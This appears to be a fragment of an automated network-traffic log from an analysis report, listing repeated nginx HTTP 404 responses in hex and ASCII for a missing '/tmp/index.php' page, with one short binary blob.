        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:42:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:42:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:42:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:42:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:42:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:42:54 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 63 42 f3 31 04 ed f1 49 f6 9d ed e4 21 9b 23 9a e8 31 55 12 c3 89 9b c2 63 9a 3b 0d 16 Data Ascii: #\6cB1I!#1Uc;
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:43:08 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:43:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:43:13 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:43:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:43:16 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:43:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:43:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:43:20 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:43:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
